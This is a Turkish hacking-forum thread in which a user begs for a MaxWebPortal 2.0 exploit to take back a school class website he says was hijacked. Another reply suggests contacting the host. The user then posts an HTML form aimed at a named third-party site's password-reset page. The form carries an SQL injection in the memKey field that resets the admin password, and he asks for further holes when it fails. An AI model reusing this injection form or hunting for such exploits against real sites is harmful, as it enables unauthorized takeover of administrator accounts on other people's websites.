Maxwebportal Version 2.0 HACKLEEN WARMIII???ÖLÜM-KALIM Meselesi...
-
ya version 2.0 açık bulan warsa yazabilirmi ya çok acil gerekio ölüm kalım meselesi ya arkadaşlar anlayın beni yalwarıyorm...
-
Dediğim gibi ölüm-kalım meselesi yarın tahribat üyelerinde biri ölebilir :( lütfen yarım edin ya lütfen yalvarıyorm hepinize..
-
hoca açık arancak bi sitemi yoksa versiyon açığımı istiyon siteyse siteyi söle daha çok yardım edilir...
-
www.pondys.com masum bir sınıf webmasterlığını ben üslenmiştm ama şerefsizin biri siteye dadandı 50milyon istio bide ben aldm o aldı ben aldm o aldı sonunda o benim açığı kapatmş eğer kurtaramzsm beni okulda...Onun için yarm edin lütfen yardımlarınızı bekliyorm.
-
abilerim çoğunluğunuz benden büyük dolayısıyla tecrübeli şimdi sizden yardm istiyorm ve yardm edeceğinize inanıyorm lütfen yarım edin bana şimdiden teşekkür ve saygılar...
-
açık bulamıyosan hostingle temasa geçmeyi denesene kullandıın forum free galiba iptal etmeyi dene ne biliym eğer hiç bi şey bulamıyosan accountu silmeyi dene
-
ya ama hostla irtibata geçmem uzun sürebilir dolayısıyla kendim daha doğrusu sizin yardımınızla almaya çalışcam ya 1.5 ve 1.6 içn açıklar vardı bunun gibi bi açık bulamazmıyız bu sitede??
-
şimdi tekrar baktımda version 1.5 gözüküo ama
<form action="http://www.ITFAIYEBIRLIGI.COM/password.asp?mode=reset" method="post">
<br>
şifre: <input name="pass" type="text" value="remote" size="150"><br>
şifre onayı: <input name="pass2" type="text" value="remote" size="150"><br>
admin numarası: <input name="memId" type="text" value="-1" size="150"><br>
bunu değiştirme: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150"><br><input name="Submit" type="submit" value="Gönder dayi">işe yaramıo bunu kapatmş adam nasıl yaptıysa başka çözümüm yokmu abiler :(
-
benim bildiğim max portal en güvenli olanı
kolay kolay açığı bulunmaz
Toplam Hit: 2320 Toplam Mesaj: 9